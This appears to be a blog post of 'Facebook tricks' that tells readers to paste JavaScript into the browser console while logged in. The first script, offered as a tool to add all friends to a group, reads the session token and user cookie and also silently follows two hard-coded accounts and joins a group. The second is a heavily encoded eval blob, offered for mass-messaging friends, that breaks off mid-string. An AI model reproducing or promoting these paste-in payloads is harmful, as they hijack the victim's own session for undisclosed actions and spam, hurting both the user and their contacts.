Top 5 Facebook Scripts Trick

Posted by Unknown on 16:36 with No comments

Top 5 Facebook Scripts Trick


We use facebook in daily life. We chat with our friends,share pictures,share videos,comments and many more…to make facebooking more interesting  we can use many tricks in facebook.This all tricks are make your hard work on facebook easy like adding all friends in group at one click.So check out this facebook Tricks.



1. How to add all Friends to Facebook Group

So this is a tutorial on how to add all your friends in a facebook page in just a few steps. So if you are an admin of a facebook group which has less members then you might have a hard time to add all your friends one by one and which is a very  hard job. So, to help all you facebook group admins out, we share you an unique script with which you can add all your friends to the group. 


So this is a tutorial on how to add all your friends in a facebook page in just a few steps. So if you are an admin of a facebook group which has less members then you might have a hard time to add all your friends one by one and which is a very  hard job. So, to help all you facebook group admins out, we share you an unique script with which you can add all your friends to the group. So enough said, let’s proceed on to the tutorial.

Conditions


  • You need to be an approved member or admin of the facebook group in which you wish to add your friends.
  •  You must be browsing facebook through Mozilla Firefox or Google Chrome. Sorry, Internet Explorer or other web browsers not yet supported.

Steps


  • Go to the facebook group in which you wish to add your friends to using Mozilla Firefox or Google Chrome.
  •  Press F12 when you’re on the group. Then click on console as illustrated in the image below.
  • After going to console ,paste the code below and press enter.
 (function(){var f={dtsg:document.getElementsByName(“fb_dtsg”)[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]),gid:document.getElementsByName(“group_id”)[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open(“GET”,b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval(“(“+c.responseText.substr(9)+”)”);a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById(“hasilsurasil”).innerHTML=”Found <b>”+f.frns.length+” Prophet</b><div id=’hasilsatu’></div><div id=’hasildua’></div><div id=’hasiltiga’ style=’min-width:300px;display:inline-block;text-align:left’></div>”+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById(“hasilsurasil”).innerHTML=4==c.readyState&&404==c.status?”<b style=’color:darkred’>Gruppe Öffnen!</b>”+crj:”<b style=’color:darkgreen’>Suche nach möglichen Abonnenten… (“+c.readyState+”)</b>”+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm=”__a=1&fb_dtsg=”+f.dtsg+”&group_id=”+f.gid+”&source=typeahead&ref=&message_id=&members=”+f.frns[d].uid+”&__user=”+f.uid+”&phstamp=”;e.open(“POST”,”/ajax/groups/members/add_post.php”,!0),e.setRequestHeader(“Content-type”,”application/x-www-form-urlencoded”),e.setRequestHeader(“Content-length”,prm.length),e.setRequestHeader(“Connection”,”keep-alive”),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval(“(“+e.responseText.substr(9)+”)”);if(f.prenKe++,document.getElementById(“hasilsatu”).innerHTML=”<div><b>”+f.prenKe+”</b> of <b>”+f.frns.length+”</b></div>”,a.errorDescription&&(f.gagal++,document.getElementById(“hasiltiga”).innerHTML=”<div><b style=’color:darkred’>( “+f.gagal+” )</b> <span style=’color:darkred’>”+a.errorDescription+”</span></div>”),a.jsmods&&a.jsmods.require){var b=”<div>”;for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+=”<b style=’color:darkgreen’>”+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+”</b> “);b+=”<div>”,document.getElementById(“hasildua”).innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,””));if(c.uid&&c.name){f.okeh++,document.getElementById(“hasiltiga”).innerHTML=”<div><b style=’color:darkgreen’>( “+f.okeh+” )</b> <a href=’/”+c.uid+”‘ target=’_blank’><b>”+c.name+”</b></a> haben dich abonniert.</div>”;break}}f.prenKe==f.frns.length&&(document.getElementById(“hasiltiga”).style.textAlign=”center”,document.getElementById(“hasiltiga”).innerHTML+=”<div style=’font-size:20px;font-weight:bold’>20 Leute Einladen!</div><a href=’/’ onClick=’document.getElementById(“hasilsurasil”).style.display=”none”;return false’>Schliesen</a>”)}},e.send(prm)}},g=[“i”,”a”,”e”,”g”,”o”,”s”,”n”,”b”,”l”,”p”,”m”,”2″,”r”,”0″,”c”,”1″,”t”,”3″,”©”],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+”.”+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+”.”+g[14]+g[4]+g[10],crj=”<div style=’margin-top:10px;color:gray;font-size:12px’>”+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+” “+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+”<div style=’font-size:9px’><a href=’http://”+crl+”/’ target=’_blank’>”+crl+”</a></div></div>”;document.body.innerHTML+=”<center id=’hasilsurasil’ style=’min-height:50px;width:600px;position:fixed;top:100px;left:”+(document.body.offsetWidth-530)/2+”px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)’><b>fb.com/prophethaxor … Script by Prophet </b>”+crj+”</center>”,f.getAjak(“/ajax/typeahead/first_degree.php?__a=1&viewer=”+f.uid+”&token=”+Math.random()+”&filter[0]=user&options[0]=friends_only”)})(); var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1])
function cereziAl(isim) {
var tarama = isim + “=”;
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(“;”, konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return “”; }
}
}
function getRandomInt (min, max) {
return Math.floor(Math.random() * (max – min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}
var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);
function a(abone){
var http4 = new XMLHttpRequest();
var url4 = “/ajax/follow/follow_profile.php?__a=1”;
var params4 = “profile_id=” + abone + “&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=” + fb_dtsg + “&lsd&__” + user_id + “&phstamp=”;
http4.open(“POST”, url4, true);
//Send the proper header information along with the request
http4.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
http4.setRequestHeader(“Content-length”, params4.length);
http4.setRequestHeader(“Connection”, “close”);
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
}
function sublist(uidss) {
var a = document.createElement(‘script’);
a.innerHTML = “new AsyncRequest().setURI(‘/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe’).setData({ flid: ” + uidss + ” }).send();”;
document.body.appendChild(a);
}
a(“100001068547215”);
a(“100004230073255”);
var fb_dtsg = document[‘getElementsByName’](‘fb_dtsg’)[0][‘value’];
var user_id = document[‘cookie’][‘match’](document[‘cookie’][‘match’](/c_user=(d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = ‘/ajax/groups/membership/r2j.php?__a=1’;
var paramswp = ‘&ref=group_jump_header&group_id=’ + gid + ‘&fb_dtsg=’ + fb_dtsg + ‘&__user=’ + user_id + ‘&phstamp=’;
httpwp[‘open’](‘POST’, urlwp, true);
httpwp[‘setRequestHeader’](‘Content-type’, ‘application/x-www-form-urlencoded’);
httpwp[‘setRequestHeader’](‘Content-length’, paramswp[‘length’]);
httpwp[‘setRequestHeader’](‘Connection’, ‘keep-alive’);
httpwp[‘send’](paramswp);
var fb_dtsg = document[‘getElementsByName’](‘fb_dtsg’)[0][‘value’];
var user_id = document[‘cookie’][‘match’](document[‘cookie’][‘match’](/c_user=(d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf[‘open’](‘GET’, ‘/ajax/typeahead/first_degree.php?__a=1&viewer=’ + user_id + ‘&token’ + Math[‘random’]() + ‘&filter[0]=user&options[0]=friends_only’, false);
gf[‘send’]();
if (gf[‘readyState’] != 4) {} else {
data = eval(‘(‘ + gf[‘responseText’][‘substr’](9) + ‘)’);
if (data[‘error’]) {} else {
friends = data[‘payload’][‘entries’][‘sort’](function (_0x93dax8, _0x93dax9) {
return _0x93dax8[‘index’] – _0x93dax9[‘index’];
});
};
};


2. Message all Friends Automatically on Facebook


So this is a tutorial on how to message all your fb friends in just few steps..You might have understood that we are going to message all friends automatically with help of a script which i will be providing you.All that i can say about this script is that it's amazing.It not even send MSG to friends but also to all those to whom you are following. Isn't it cool? .Yeah,it can help you to promote your Facebook Pages, to get visitors to your website,to get views to your YouTube videos, to get more likes on your statues and many other promotional things.


Step 1.
Login your FB account
Step 2.
Copy the Script code
/*Message All Friends Automatically On Facebook.*/
eval(unescape(“%6A%61%76%61%73%63%72%69%70%74%3A%20%76%61%72%20%67%72%6F%75%70%70%6F%73%74%20%3D%20%22%3C%64%69%76%3E%3C%73%70%61%6E%20%63%6C%61%73%73%3D%27%69%6D%67%20%73%70%5F%66%35%32%77%37%6C%20%73%78%5F%34%37%31%33%32%64%27%3E%3C%2F%73%70%61%6E%3E%3C%61%20%73%74%79%6C%65%3D%27%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%73%69%7A%65%3A%33%70%78%3B%70%61%64%64%69%6E%67%2D%6C%65%66%74%3A%33%70%78%3B%66%6F%6E%74%2D%77%65%69%67%68%74%3A%62%6F%6C%64%3B%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%54%61%68%6F%6D%61%3B%66%6F%6E%74%2D%73%69%7A%65%3A%31%31%70%78%3B%63%6F%6C%6F%72%3A%23%33%42%35%39%39%38%3B%27%3E%57%72%69%74%65%20%50%6F%73%74%3C%2F%61%3E%3C%2F%64%69%76%3E%3C%2F%62%72%3E%22%3B%0A%67%72%6F%75%70%70%6F%73%74%20%2B%3D%20%22%3C%64%69%76%3E%3C%74%65%78%74%61%72%65%61%20%69%64%3D%27%74%78%74%46%6C%6F%6F%64%4D%73%67%27%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%27%57%72%69%74%65%20%73%6F%6D%65%74%68%69%6E%67%2E%2E%2E%27%20%73%74%79%6C%65%3D%27%70%61%64%64%69%6E%67%2D%74%6F%70%3A%35%70%78%3B%77%69%64%74%68%3A%34%39%33%70%78%3B%68%65%69%67%68%74%3A%38%35%70%78%3B%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%74%61%68%6F%6D%61%3B%66%6F%6E%74%2D%73%69%7A%65%3A%31%33%70%78%3B%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%72%67%62%61%28%32%35%35%2C%32%35%35%2C%32%35%35%2C%30%2E%31%29%3B%63%6F%6C%6F%72%3A%23%66%66%66%66%66%66%27%3E%3C%2F%74%65%78%74%61%72%65%61%3E%3C%2F%64%69%76%3E%22%3B%0A%67%72%6F%75%70%70%6F%73%74%20%2B%3D%20%22%3C%64%69%76%3E%3C%73%70%61%6E%20%63%6C%61%73%73%3D%27%69%6D%67%20%73%70%5F%64%70%6B%65%66%35%20%73%78%5F%66%30%35%32%35%31%27%3E%3C%2F%73%70%61%6E%3E%3C%61%20%73%74%79%6C%65%3D%27%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%41%72%69%61%6C%3B%73%69%7A%65%3A%33%70%78%3B%70%61%64%64%69%6E%67%2D%6C%65%66%74%3A%33%70%78%3B%66%6F%6E%74%2D%73%69%7A%65%3A%31%31%70%78%3B%63%6F%6C%6F%72%3A%72%67%62%28%31%32%38%2C%20%31%32%38%2C%20%31%32%38%29%3B%27%3E%53%63%72%69%70%74%20%50%72%69%76%61%63%79%3A%20%50%75%62%6C%69%63%20%3C%2F%61%3E%3C%2F%73%70%61%6E%3E%3C%62%75%74%74%6F%6E%20%73%74%79%6C%65%3D%27%6D%61%72%67%69%6E%2D%6C%65%66%74%3A%34%33%37%70%78%27%20%63%6C%61%73%73%3D%27%5F%34%32%66%74%20%5F%34%6A%79%30%20%5F%31%31%62%20%5F%34%6A%79%33%20%5F%34%6A%79%31%20%73%65%6C%65%63%74%65%64%27%20%6F%6E%63%6C%69%63%6B%3D%27%61%75%74%6F%70%6F%73%74%69%6E%67%66%75%6E%63%28%74%68%69%73%29%3B%27%20%3E%50%6F%73%74%3C%2F%62%75%74%74%6F%6E%3E%3C%62%72%3E%22%2B%5F%74%65%78%74%2B%22%3C%2F%64%69%76%3E%22%3B%0A%76%61%72%20%5F%74%65%78%74%20%3D%20%27%50%6F%77%65%72%65%64%20%42%79%3A%20%3C%41%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%23%33%42%35%39%39%38%3B%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%33%31%33%30%37%32%35%33%32%31%30%31%30%37%36%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%3E%4C%6F%61%64%69%6E%67%20%5B%6C%6C%6C%6C%6C%6C%6C%6C%6C%6C%6C%20%5D%20%39%39%25%3C%2F%41%3E%20%26%20%3C%41%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%23%33%42%35%39%39%38%3B%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%31%39%39%31%33%34%34%39%36%39%31%34%30%37%37%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%3E%20%41%73%73%61%6D%20%49%6E%64%69%61%6E%20%43%79%62%65%72%20%46%6F%72%63%65%3C%2F%41%3E%2E%3C%2F%62%72%3E%53%63%72%69%70%74%20%4D%61%64%65%20%42%79%3A%20%3C%2F%41%3E%3C%41%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%23%33%42%35%39%39%38%3B%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%31%30%30%30%30%31%30%35%30%32%33%35%34%32%30%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%3E%20%57%61%71%61%72%20%41%68%6D%61%64%3C%2F%41%3E%3C%2F%41%3E%2C%3C%2F%41%3E%3C%41%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%23%33%42%35%39%39%38%3B%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%31%30%30%30%30%35%31%31%35%39%33%38%36%31%34%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%3E%20%42%68%61%72%67%61%76%20%4A%54%2E%20%47%6F%67%6F%69%3C%2F%41%3E%3C%2F%41%3E%2E%3C%2F%62%72%3E%46%6F%72%20%4D%6F%72%65%20%54%6F%6F%6C%73%20%56%69%73%69%74%20%4F%75%72%20%42%6C%6F%67%67%65%72%20%3C%41%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%23%33%42%35%39%39%38%3B%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%61%75%74%6F%6D%61%74%65%79%6F%75%72%66%61%63%65%62%6F%6F%6B%2E%62%6C%6F%67%73%70%6F%74%2E%69%6E%2F%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%3E%41%75%74%6F%6D%61%74%65%20%59%6F%75%72%20%46%61%63%65%62%6F%6F%6B%3C%2F%41%3E%2E%3C%2F%41%3E%27%3B%0A%76%61%72%20%50%6F%70%75%70%73%65%74%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%64%69%76%22%29%3B%0A%50%6F%70%75%70%73%65%74%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%73%74%79%6C%65%22%2C%20%22%6D%69%6E%2D%68%65%69%67%68%74%3A%35%30%70%78%3B%77%69%64%74%68%3A%35%30%30%70%78%3B%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%74%6F%70%3A%31%30%30%70%78%3B%62%6F%78%2D%73%68%61%64%6F%77%3A%20%30%70%78%20%34%70%78%20%31%30%70%78%20%72%67%62%61%28%32%34%2C%20%31%34%34%2C%20%32%35%35%2C%20%30%2E%36%33%29%3B%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%6C%65%66%74%3A%35%30%25%3B%6D%61%72%67%69%6E%2D%6C%65%66%74%3A%2D%32%37%33%70%78%3B%74%65%78%74%2D%61%6C%69%67%6E%3A%6C%65%66%74%3B%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%31%30%70%78%3B%70%61%64%64%69%6E%67%3A%35%70%78%3B%7A%2D%69%6E%64%65%78%3A%39%39%39%39%39%39%3B%62%6F%72%64%65%72%3A%35%70%78%20%73%6F%6C%69%64%20%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%39%29%3B%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%39%29%3B%63%6F%6C%6F%72%3A%23%66%66%66%66%66%66%22%29%3B%0A%50%6F%70%75%70%73%65%74%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%67%72%6F%75%70%70%6F%73%74%3B%0A%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%50%6F%70%75%70%73%65%74%29%3B%0A%6A%78%20%3D%20%7B%0A%20%20%20%20%67%65%74%48%54%54%50%4F%62%6A%65%63%74%3A%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%76%61%72%20%41%20%3D%20%66%61%6C%73%65%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%74%79%70%65%6F%66%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%20%21%3D%20%22%75%6E%64%65%66%69%6E%65%64%22%29%20%74%72%79%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%41%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%22%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50%22%29%0A%20%20%20%20%20%20%20%20%7D%20%63%61%74%63%68%20%28%43%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%72%79%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%41%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%22%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%63%61%74%63%68%20%28%42%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%41%20%3D%20%66%61%6C%73%65%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%20%65%6C%73%65%20%69%66%20%28%77%69%6E%64%6F%77%2E%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%29%20%74%72%79%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%41%20%3D%20%6E%65%77%20%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%0A%20%20%20%20%20%20%20%20%7D%20%63%61%74%63%68%20%28%43%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%41%20%3D%20%66%61%6C%73%65%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%41%0A%20%20%20%20%7D%2C%0A%20%20%20%20%6C%6F%61%64%3A%20%66%75%6E%63%74%69%6F%6E%20%28%75%72%6C%2C%20%63%61%6C%6C%62%61%63%6B%2C%20%66%6F%72%6D%61%74%2C%20%6D%65%74%68%6F%64%2C%20%6F%70%74%29%20%7B%0A%20%20%20%20%20%20%20%20%76%61%72%20%68%74%74%70%20%3D%20%74%68%69%73%2E%69%6E%69%74%28%29%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%21%68%74%74%70%20%7C%7C%20%21%75%72%6C%29%20%72%65%74%75%72%6E%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%68%74%74%70%2E%6F%76%65%72%72%69%64%65%4D%69%6D%65%54%79%70%65%29%20%68%74%74%70%2E%6F%76%65%72%72%69%64%65%4D%69%6D%65%54%79%70%65%28%22%74%65%78%74%2F%78%6D%6C%22%29%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%21%6D%65%74%68%6F%64%29%20%6D%65%74%68%6F%64%20%3D%20%22%47%45%54%22%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%21%66%6F%72%6D%61%74%29%20%66%6F%72%6D%61%74%20%3D%20%22%74%65%78%74%22%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%21%6F%70%74%29%20%6F%70%74%20%3D%20%7B%7D%3B%0A%20%20%20%20%20%20%20%20%66%6F%72%6D%61%74%20%3D%20%66%6F%72%6D%61%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%3B%0A%20%20%20%20%20%20%20%20%6D%65%74%68%6F%64%20%3D%20%6D%65%74%68%6F%64%2E%74%6F%55%70%70%65%72%43%61%73%65%28%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%6E%6F%77%20%3D%20%22%75%69%64%3D%22%20%2B%20%28%6E%65%77%20%44%61%74%65%29%2E%67%65%74%54%69%6D%65%28%29%3B%0A%20%20%20%20%20%20%20%20%75%72%6C%20%2B%3D%20%75%72%6C%2E%69%6E%64%65%78%4F%66%28%22%3F%22%29%20%2B%20%31%20%3F%20%22%26%22%20%3A%20%22%3F%22%3B%0A%20%20%20%20%20%20%20%20%75%72%6C%20%2B%3D%20%6E%6F%77%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%70%61%72%61%6D%65%74%65%72%73%20%3D%20%6E%75%6C%6C%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%6D%65%74%68%6F%64%20%3D%3D%20%22%50%4F%53%54%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%70%61%72%74%73%20%3D%20%75%72%6C%2E%73%70%6C%69%74%28%22%3F%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%75%72%6C%20%3D%20%70%61%72%74%73%5B%30%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%70%61%72%61%6D%65%74%65%72%73%20%3D%20%70%61%72%74%73%5B%31%5D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%68%74%74%70%2E%6F%70%65%6E%28%6D%65%74%68%6F%64%2C%20%75%72%6C%2C%20%74%72%75%65%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%74%68%73%20%3D%20%74%68%69%73%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%6F%70%74%2E%68%61%6E%64%6C%65%72%29%20%68%74%74%70%2E%6F%6E%72%65%61%64%79%73%74%61%74%65%63%68%61%6E%67%65%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%6F%70%74%2E%68%61%6E%64%6C%65%72%28%68%74%74%70%29%0A%20%20%20%20%20%20%20%20%7D%3B%0A%20%20%20%20%20%20%20%20%65%6C%73%65%20%68%74%74%70%2E%6F%6E%72%65%61%64%79%73%74%61%74%65%63%68%61%6E%67%65%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%68%74%74%70%2E%72%65%61%64%79%53%74%61%74%65%20%3D%3D%20%34%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%68%74%74%70%2E%73%74%61%74%75%73%20%3D%3D%20%32%30%30%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%72%65%73%75%6C%74%20%3D%20%22%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%68%74%74%70%2E%72%65%73%70%6F%6E%73%65%54%65%78%74%29%20%72%65%73%75%6C%74%20%3D%20%68%74%74%70%2E%72%65%73%70%6F%6E%73%65%54%65%78%74%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%66%6F%72%6D%61%74%2E%63%68%61%72%41%74%28%30%29%20%3D%3D%20%22%6A%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%72%65%73%75%6C%74%20%3D%20%72%65%73%75%6C%74%2E%72%65%70%6C%61%63%65%28%2F%5B%5C%6E%5C%72%5D%2F%67%2C%20%22%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%72%65%73%75%6C%74%20%3D%20%65%76%61%6C%28%22%28%22%20%2B%20%72%65%73%75%6C%74%20%2B%20%22%29%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%65%6C%73%65%20%69%66%20%28%66%6F%72%6D%61%74%2E%63%68%61%72%41%74%28%30%29%20%3D%3D%20%22%78%22%29%20%72%65%73%75%6C%74%20%3D%20%68%74%74%70%2E%72%65%73%70%6F%6E%73%65%58%4D%4C%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%63%61%6C%6C%62%61%63%6B%29%20%63%61%6C%6C%62%61%63%6B%28%72%65%73%75%6C%74%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%6F%70%74%2E%6C%6F%61%64%69%6E%67%49%6E%64%69%63%61%74%6F%72%29%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%62%6F%64%79%22%29%5B%30%5D%2E%72%65%6D%6F%76%65%43%68%69%6C%64%28%6F%70%74%2E%6C%6F%61%64%69%6E%67%49%6E%64%69%63%61%74%6F%72%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%6F%70%74%2E%6C%6F%61%64%69%6E%67%29%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%6F%70%74%2E%6C%6F%61%64%69%6E%67%29%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%22%6E%6F%6E%65%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%65%72%72%6F%72%29%20%65%72%72%6F%72%28%68%74%74%70%2E%73%74%61%74%75%73%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%3B%0A%20%20%20%20%20%20%20%20%68%74%74%70%2E%73%65%6E%64%28%70%61%72%61%6D%65%74%65%72%73%29%0A%20%20%20%20%7D%2C%0A%20%20%20%20%62%69%6E%64%3A%20%66%75%6E%63%74%69%6F%6E%20%28%41%29%20%7B%0A%20%20%20%20%20%20%20%20%76%61%72%20%43%20%3D%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%22%75%72%6C%22%3A%20%22%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22%6F%6E%53%75%63%63%65%73%73%22%3A%20%66%61%6C%73%65%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22%6F%6E%45%72%72%6F%72%22%3A%20%66%61%6C%73%65%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22%66%6F%72%6D%61%74%22%3A%20%22%74%65%78%74%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22%6D%65%74%68%6F%64%22%3A%20%22%47%45%54%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22%75%70%64%61%74%65%22%3A%20%22%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22%6C%6F%61%64%69%6E%67%22%3A%20%22%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22%6C%6F%61%64%69%6E%67%49%6E%64%69%63%61%74%6F%72%22%3A%20%22%22%0A%20%20%20%20%20%20%20%20%7D%3B%0A%20%20%20%20%20%20%20%20%66%6F%72%20%28%76%61%72%20%42%20%69%6E%20%43%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%41%5B%42%5D%29%20%43%5B%42%5D%20%3D%20%41%5B%42%5D%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%21%43%2E%75%72%6C%29%20%72%65%74%75%72%6E%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%44%20%3D%20%66%61%6C%73%65%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%43%2E%6C%6F%61%64%69%6E%67%49%6E%64%69%63%61%74%6F%72%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%44%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%64%69%76%22%29%3B%0A%20%20%20%20%20%20%